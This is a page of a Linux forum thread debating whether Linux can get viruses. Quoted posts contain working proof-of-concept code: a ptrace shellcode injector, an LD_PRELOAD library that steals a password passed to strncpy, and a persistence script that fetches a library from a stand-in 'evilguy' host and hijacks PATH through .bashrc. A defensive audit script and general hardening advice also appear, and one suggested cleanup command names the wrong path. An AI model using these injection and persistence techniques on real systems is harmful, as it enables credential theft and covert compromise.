Page 3 of 4
Results 21 to 30 of 32
  1. #21
    khf
    Just Joined!
    Join Date
    Mar 2009
    Location
    Moves between London, Oslo, Brussels
    Posts
    30

    Other study the


    Quote Originally Posted by wisehacks
    It seems that you're not aware of what you're talking about. You are saying you cannot modify another process running with your same user id or read its data? Really? As you say, HAVE YOU EVER TRIED? Let's give you a simple POC. Look at this sample code:
    Code:
    #include <stdio.h>
    #include <unistd.h>

    int main(int argc, char** argv){
        int v = 5;

        while (1){
            printf("Meaning of life is %d\n", v);
            sleep(1);
        }
        return 0;
    }
    Let's just exec it:
    Code:
    [wisehacks@trantor ~]$ gcc -o victim victim.c 
    [wisehacks@trantor ~]$ ./victim 
    Meaning of life is 5
    Meaning of life is 5
    Meaning of life is 5
    ^C

    Code:
    #include <stdlib.h>
    #include <stdio.h>
    #include <unistd.h>
    #include <sys/ptrace.h>
    #include <sys/types.h>
    #include <sys/wait.h>   // declares wait(); the original relied on an implicit declaration
    #include <string.h>
    #include <sys/user.h>
    #include <signal.h>
    #include <errno.h>

    // Machine code to inject, write() followed by exit(0)
    unsigned char code[]=
     "\x31\xc0\xb0\x04\x31\xdb\x43\xeb\x12\x31\xc9\x8b\x0c\x24\x31\xd2"
     "\xb2\x1c\xcd\x80\x31\xc0\x40\x31\xdb\xcd\x80\xe8\xe9\xff\xff\xff"
     "\x45\x6c\x20\x73\x65\x6e\x74\x69\x64\x6f\x20\x64\x65\x20\x6c\x61"
     "\x20\x76\x69\x64\x61\x20\x65\x73\x20\x34\x32\x0a";

    int main(int argc, char** argv){
        pid_t pid;
        int i;
        struct user_regs_struct regs;

        if (argc != 2){
            printf("Usage: %s <process id>\n",argv[0]);
            exit(1);
        }

        pid = (pid_t)atoi(argv[1]);

        printf("[?] Attaching to process %d...\n",pid);
        if (ptrace(PTRACE_ATTACH, pid,0,0) < 0){
            perror("[!] ptrace: ATTACH");
            exit(1);
        }
        printf("[+] Succesfully attached!\n");

        // Wait to be sure the process has stopped
        wait(NULL);

        printf("[?] Getting register information for the process...\n");
        if (ptrace(PTRACE_GETREGS, pid, 0, &regs) < 0){
            perror("[!] ptrace: GETREGS");
            exit(1);
        }
        printf("[+] Got eip pointing at 0x%x\n", (unsigned int)regs.eip);

        printf("[?] Injecting code at eip...\n");
        for (i=0;i<strlen(code);i++){
            if (ptrace(PTRACE_POKEDATA, pid, regs.eip+i,*(unsigned char*)(code+i))) {
                perror("[!]ptrace: POKEDATA");
                exit(1);
            }
        }

        printf("[+] Code injected succesfully!\n[?] Detaching...\n");
        // should check if the proc exists,
        // if it does, it should be stopped with sigstop before detaching
        // if it's stopped by the means of another signal, make it continue and
        // then stop it. If the process is part of a thread group things are a little more
        // complicated. But, hey, this is just a POC
        if (ptrace(PTRACE_DETACH, pid, 0, SIGCONT) == -1){
            if (errno != ESRCH){
                // shouldn't happen
                perror("[!] Detach: ");
                exit(1);
            }
            kill(pid, SIGCONT);
        }
        printf("[+] Done!\n");
        return 0;
    }


    Code:
    [wisehacks@trantor ~]$ ./victim 
    Meaning of life is 5
    Meaning of life is 5
    Meaning of life is 5
    Meaning of life is 5
    Meaning of life is 5
    Meaning of life is 5
    Meaning of life is 5
    Meaning of life is 5
    El sentido de la vida es 42
    (The message is in Spanish, because I didn't want to change the binary code for this demo, but it means the same as the English one). In the injector window we see:
    Code:
    [wisehacks@trantor~]$ gcc -o inject inject.c 
    [wisehacks@trantor ~]$ ps uax | grep -i victim
    wisehacks    6640  0.0  0.0   1496   328 pts/4    S+   09:00   0:00 ./victim
    wisehacks    6642  0.0  0.0   3916   768 pts/3    R+   09:00   0:00 grep -i victim
    [wisehacks@trantor ~]$ ./inject 6640
    [?] Attaching to process 6640...
    [+] Succesfully attached!
    [?] Getting register information for the process...
    [+] Got eip pointing at 0xf772c430
    [?] Injecting code at eip...
    [+] Code injected succesfully!
    [?] Detaching...
    [+] Done!
    Code:
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    
    int send_pass(char* pass){
    	printf("Im gonna send the password %s over the network\n", pass);
    	// do stuff
    	return 0;
    }
    
    int main(int argc, char** argv){
    
    	char buffer[250];
    
    	if (argc!=2){
    		printf("Usage: %s <password>\n", argv[0]);
    		exit(1);
    	}
    	if (strlen(argv[1]) >= 250){
    		printf("Password is too long\n");
    		exit(1);
    	}
    	
    	strncpy(buffer, argv[1], 250);
    	send_pass(buffer);
    
    	return 0;
    }
    Now take a look at this "replacement" evil code:
    Code:
    #include <stdio.h>
    
    char *strncpy(char *dest, const char *src, size_t n){
    	char *ret = dest;
    	
    	printf("Your password have been owned, it was %s\n", src);
    	// do the same as strncpy so the user doesnt notice
    	do{
    		if (!n--)
    		return ret;
    	} while ((*dest++ = *src++));
    	while (n--)
    		*dest++ = 0;
    	return ret;
    }
    Compile it and run:
    Code:
    [wisehacks@trantor ~]$ gcc -Wall -fPIC -shared -o evilso.so evilso.c 
    [wisehacks@trantor ~]$ gcc -o victim2 victim2.c 
    [wisehacks@trantor ~]$ ./victim2 
    Usage: ./victim2 <password>
    [wisheacks@trantor ~]$ ./victim2 mypass
    Im gonna send the password mypass over the network
    [wisehacks@trantor~]$ LD_PRELOAD="./evilso.so" ./victim2 mypass
    Your password have been owned, it was mypass
    Im gonna send the password mypass over the network
    :
    Code:
    #!/bin/sh
    
    mkdir ~/.hidden
    cd ~/.hidden
    wget hxxp://evilguy/evilso.so
    echo "#!/bin/sh
            LD_PRELOAD=\"./evilso.so\" ls $@" >> ls
    chmod +x ls
    
    echo "PATH=~/.hidden:$PATH" >> ~/.bashrc
    .
    You seem to have never ever tried to code, nor to understand. In the first example, show how you can get it to print "6" instead of 5 without modifying the source code and relinking other code. It is possible by starting the application in a debugger and patching "5" on the call stack to "printf" to "6". However, the next time you start the application it will print 5, so what is the point?
    You can of course also write your own debugger that you can load with your favourite address maps, and make this modify the binaries. These are also files, fully modifiable, and we have done this for ages. I just fail to see how this is related to a "virus" or "hacking".

    For command hacking, this is the most common way of obtaining control of a *NIX computer. Once your ".hidden" contains all the Linux commands - /bin and /usr/bin - you can make it play "Pop goes the weasel". The remedy is however very simple: run "rm -f /.hidden/*.*" - yes I really wanna do this..

    Type in the command shell: echo $PATH - to see if there is a "$HOME/.hidden" in it.
    You should remove the .hidden from your search path.
    Make a copy of the .bashrc: cp ~/.bashrc .bashrc.sav
    .. and: diff ~/.bashrc .bashrc.sav
    will show any differences; restore with cp .bashrc.sav ~/.bashrc

    You can "chmod" the file to read-only, this will only make some scripts fail when they try to update the startup-script, good scripts will prompt you to change access to the file. Now, compare with Windows: How much protection do you find on the registry? - and on the "RUN" keys? - nada!!!
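
A defender's counterpart to the remedy above, added here as an example that is not code from this thread: a POSIX sh audit that applies the PATH and .bashrc checks khf describes, and also looks for LD_PRELOAD hooks and reads the Yama ptrace_scope sysctl (a kernel knob that postdates this thread; value 0 is what the ptrace injector quoted above depends on). Assumed paths are /etc/ld.so.preload and /proc/sys/kernel/yama/ptrace_scope; the demo input at the bottom is constructed.

```shell
#!/bin/sh
# Audit for the mechanisms shown in this post (added example, not from the thread):
#   1. a PATH entry under $HOME placed before /bin and /usr/bin (the ~/.hidden trick)
#   2. lines that appeared in ~/.bashrc since a saved copy was taken
#   3. LD_PRELOAD in the environment or entries in /etc/ld.so.preload
#   4. the Yama ptrace_scope sysctl (0 lets any same-uid process PTRACE_ATTACH,
#      as the injector above relies on; 1 limits attach to descendants)
# Every function takes its input as arguments so it can be run on real files or on
# the constructed samples in the demo at the bottom.

# $1: a PATH string, $2: the home directory.  Prints offending entries, one per line.
path_hijack_entries() {
    _home="$2"; _seen_sys=0; _old_ifs="$IFS"; IFS=:
    for _dir in $1; do
        case "$_dir" in
            /bin|/usr/bin) _seen_sys=1 ;;
            "$_home"/*|'~/'*)
                if [ "$_seen_sys" -eq 0 ]; then printf '%s\n' "$_dir"; fi ;;
        esac
    done
    IFS="$_old_ifs"
}

# $1: live rc file, $2: saved copy.  Prints lines present only in the live file.
rc_added_lines() {
    diff "$2" "$1" | sed -n 's/^> //p'
}

# $1: preload file (defaults to /etc/ld.so.preload).  Prints env and file entries.
preload_libs() {
    _f="${1:-/etc/ld.so.preload}"
    if [ -n "$LD_PRELOAD" ]; then printf 'env:%s\n' "$LD_PRELOAD"; fi
    if [ -r "$_f" ]; then
        grep -v -e '^[[:space:]]*#' -e '^[[:space:]]*$' "$_f" | sed 's/^/file:/'
    fi
}

# $1: sysctl file (defaults to the Yama path).  Prints the scope or "unavailable".
ptrace_scope() {
    _f="${1:-/proc/sys/kernel/yama/ptrace_scope}"
    if [ -r "$_f" ]; then cat "$_f"; else echo unavailable; fi
}

# Demo on constructed input: a PATH and rc files as the script above would leave them.
demo_path='/home/alice/.hidden:/usr/local/bin:/usr/bin:/bin'
path_hijack_entries "$demo_path" /home/alice          # prints /home/alice/.hidden
tmp=$(mktemp -d)
printf 'export EDITOR=vi\n' > "$tmp/bashrc.sav"
printf 'export EDITOR=vi\nPATH=~/.hidden:$PATH\n' > "$tmp/bashrc"
rc_added_lines "$tmp/bashrc" "$tmp/bashrc.sav"        # prints PATH=~/.hidden:$PATH
rm -rf "$tmp"
# Against the real system:
#   path_hijack_entries "$PATH" "$HOME"; rc_added_lines ~/.bashrc ~/.bashrc.sav
#   preload_libs; ptrace_scope
```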

  2. #22
    Just Joined!
    Join Date
    Apr 2010
    Posts
    7
    Quote Originally Posted by khf
    oh yes - you just illustrated my point well DumbHack.
    And here we go again...

    Quote Originally Posted by khf
    It is fully possible to attach in a running application sequence that is a subshell of current executing shell.
    What??? Stop speaking nonsense. I'm attaching to a process running from another shell. Moreover, you can use my example and attach to a process running from the desktop. No subshell at all.

    Quote Originally Posted by khf
    Here you kill the previous application to release the output stream and print something else does not impress me much and doubtfully anyone else.
    I do WHAAAT? READ THE ****ING CODE, and if you are not able to understand it, learn programming first. I do NOT kill the previous application. I inject code that it will exec; it's just that my example injects a write syscall and an exit syscall, but if I didn't exit, the victim would continue executing after my injection.

    Quote Originally Posted by khf
    This is not "hijacking" it is reading the exit value of an application that terminates and "do something". This is how workflow is implemented - you place code at the end, check exit status and decide on "next application" based on the status code.
    More nonsense here! Great! Where am I reading the exit value of what? I'm starting to think that you are kidding or are fairly ignorant.

    Quote Originally Posted by khf
    But out of curiosity: how do you intend to run this inside a browser window or as an email attachment. Kill the browser and restart it? Do not assume that people are silly.
    If you had understood half of what I posted before, you would have realized that it's possible to inject into the browser and read ITS memory while it's running. It's not necessary to kill it and restart it.

    Of course, to use LD_PRELOAD in front of the binary you need to kill it and restart it. But that is just an example of how syscalls can be intercepted. If you were smart enough, you would know that instead of injecting write() and exit() in the above example, you can inject a dlopen() or simply overwrite the memory where the code of the function lives. But as you are demonstrating, you're an expert talking nonsense.

    Quote Originally Posted by khf
    The final example is vastly too complex for most here, but essentially it is the loading procedure. You illustrate my point that it is fully possible to make silly applications on Linux too. But it use a loading / linking procedure. Should a script suddenly start to reload and relink Thunderbird and Firefox, I would certainly download a clean version from the Mozilla site.
    How confused you are. The last example (the bash script) would work as follows: it will deploy on your system and never reload or relink anything. It will just wait till you reboot and launch the apps yourself again. Anyway, that's just a stupid sample.

    Quote Originally Posted by khf
    A virus works without without modifying the existing executable file.
    This is incredible xDD You are saying, wait, you say that, oh god. You say that viruses don't infect other executables? Really? Serious? Most viruses infect the executable files or dll files of the system. You can bet on it. Even Wikipedia knows about it:
    Quote Originally Posted by Wikipedia
    In order to replicate itself, a virus must be permitted to execute code and write to memory. For this reason, many viruses attach themselves to executable files that may be part of legitimate programs. If a user attempts to launch an infected program, the virus' code may be executed simultaneously.
    Viruses have targeted various types of transmission media or hosts. This list is not exhaustive:

    * Binary executable files (such as COM files and EXE files in MS-DOS, Portable Executable files in Microsoft Windows, the Mach-O format in OSX, and ELF files in Linux)
    Arguing with you, proven that you don't know what you talk about, is quite pointless. So please, read the code, try it yourself, understand the concepts beneath it. No one cares what you think when the evidence is on the table.

  3. #23
    khf
    Just Joined!
    Join Date
    Mar 2009
    Location
    Moves between London, Oslo, Brussels
    Posts
    30
    Quote Originally Posted by wisehacks
    :
    :
    Arguing with you, proven that you don't know what you talk about, is quite pointless. So please, read the code, try it yourself, understand the concepts beneath it. No one cares what you think when the evidence is on the table.

    I fail to see any evidence, you show how to intercept a code by attaching to it, but not how to modify it quietly and leave without trace.

    I will not respond to your self-indulgence. Your code just exemplifies your ignorance of the problem and illustrates how difficult it is to plant a virus on Linux.

    Now I ask you to stop harassing this forum.

  4. #24
    Just Joined!
    Join Date
    Apr 2010
    Posts
    7
    Quote Originally Posted by khf
    I fail to see any evidence, you show how to intercept a code by attaching to it, but not how to modify it quietly and leave without trace.
    Use a little imagination, don't make me code it, please. Assume the code you want to inject is 100 bytes long. Great, then, you attach to the process, resize the text section, inject your 100 byte code, replace PLT/GOT entries (maybe add some symbols to the symbol table if required) so that your code is called instead of the original functions. Then detach and you are done.

    Another way, if you just want the victim to exec smth like dlopen(evil.so) and then continue executing (but now calling the funcs in evil.so), just do this. Attach, get EIP, save the next 100 bytes (assume your code is 100B long), copy your code there (your code should end with a trap call), make the victim cont (PTRACE_CONT). When it stops again, put the victim's code back in place, detach; you're done.

    Quote Originally Posted by khf
    I will not respond to your self-indulgence. Your code just exemplifies your ignorance of the problem and illustrates how difficult it is to plant a virus on Linux.
    Blah, blah, blah.

    What do you need as a proof? This is quite absurd.

  5. #25
    Linux Guru bigtomrodney's Avatar
    Join Date
    Nov 2004
    Location
    Ireland
    Posts
    6,133
    Okay folks, let's try and keep it to a loud whisper here.

    If this issue can't be resolved amicably the thread will be locked.

  6. #26
    khf
    Just Joined!
    Join Date
    Mar 2009
    Location
    Moves between London, Oslo, Brussels
    Posts
    30

    Summary..

    Quote Originally Posted by vndpundir2007
    hello
    I have heard that Linux is virus free. Is that true? If yes, then what is the reason behind this??
    As you read above, it is pretty difficult to make a virus that is malicious on Linux, but not impossible.
    One reason is that it is impossible to read the address space of another application, so the password you type in remains in the application that you type it in, unless this hands it uncoded to another application that publishes it on the net.

    However, it is possible to make an application that attaches to any memory and reads the data as off a file. You need to write a "debugger" that knows where to find the data, then link this to your application apparently without anyone noticing anything such as the prompt that my email browser comes with: "Whoops, a script module was started, do you want to execute this?". I am certain that "WackHack" and others have ways to stop that dialogue from appearing.

    When we designed X/Windows, we knew about malicious code, hence fields are protected. When M$ acquired Windows (they did not develop it) they acquired a field scripting language / screen manager with memory management. Since the fields are exposed, and the kernel debugger is exposed, it is simple to make applications that "do anything". So, Windows is a system development package without any security because during application development you need to have all options open.

    The biggest villain in Linux is usually yourself, because the system cannot stop you from doing silly things.
    Linux has retained the flexibility of Unix, exposing configuration details so that "WackHack" and others can muck around with your system and make it play the tunes he likes. This is a design decision - flexibility. Any changes that others do will be seen by you and approved by you (but you may have to run e.g. a firewall that detects their execution). All changes should therefore be done through your system management "package" only and with a full explanation. So, stick to one shell and limit the complexity.

    Don't worry - it is not possible to link into your browser or email client without some very advanced footwork that includes obtaining the address map of your particular browser or email client. It would be vastly simpler to remake the entire Java VM and here sniff at all goodies.

  7. #27
    Linux Engineer nujinini's Avatar
    Join Date
    Apr 2009
    Posts
    1,272
    Quote Originally Posted by bigtomrodney
    Okay folks, let's try and keep it to a loud whisper here.

    If this issue can't be resolved amicably the thread will be locked.
    hi folks,

    nujinini
    Linux User #489667

  8. #28
    Just Joined!
    Join Date
    Aug 2008
    Posts
    48
    I am going to keep this simple and with the original question. Linux is much more secure overall than Windows. But as it has been said, nothing is 100%. Windows does have more viruses, etc. than Linux does.

    When I was on Windows only I used to have to check things constantly. In Linux I still check things but I am a bit more relaxed, unless I have reason to be more alert.

    Right now I use

    rkhunter -c
    chkrootkit
    and I also have clamtk installed just in case I feel I need to run that. I have never had issues yet.

    With Linux iptables (For Firewall) are great. I do use Firestarter and just make sure things are locked down and simple (I also have a router/firewall.)

    Security is up to the user and common sense. However, with Windows, if someone whispers "virus" from another room it gets infected lol

  9. #29
    Linux User martinfromdublin's Avatar
    Join Date
    Dec 2004
    Location
    Dublin, Rep. of Ireland
    Posts
    446
    Can we focus on the original question & save the debate for the Coffee Lounge? Vndpundir2007 asked about the threat of viruses to his Linux system & the answer is the threat is unlikely but not impossible. Therefore;

    1) Deploy a firewall; if you don't have one download one, and if you need assistance, ask here & assistance shall be given.
    2) Use a complex root password that can't be easily guessed & this should not be the same as your login password.
    3) Be careful entering your credit card number on-line, consider using a third party such as Pay-Pal who store the card number but never reveal it to those you are purchasing from.
    4) Use a NAT (Network Address Translation) device; most home wireless routers & network devices use NAT by default.
    5) Use your common sense! You are safer with Linux but nothing is perfect.
    LINUX: Where do you want to go.......Tomorrow!

    Registered Linux user 396633

  10. #30
    Just Joined!
    Join Date
    Aug 2008
    Posts
    48
    Quote Originally Posted by martinfromdublin
    the answer is the threat is unlikely but not impossible
    Perfect. That pretty much sums it up right there.

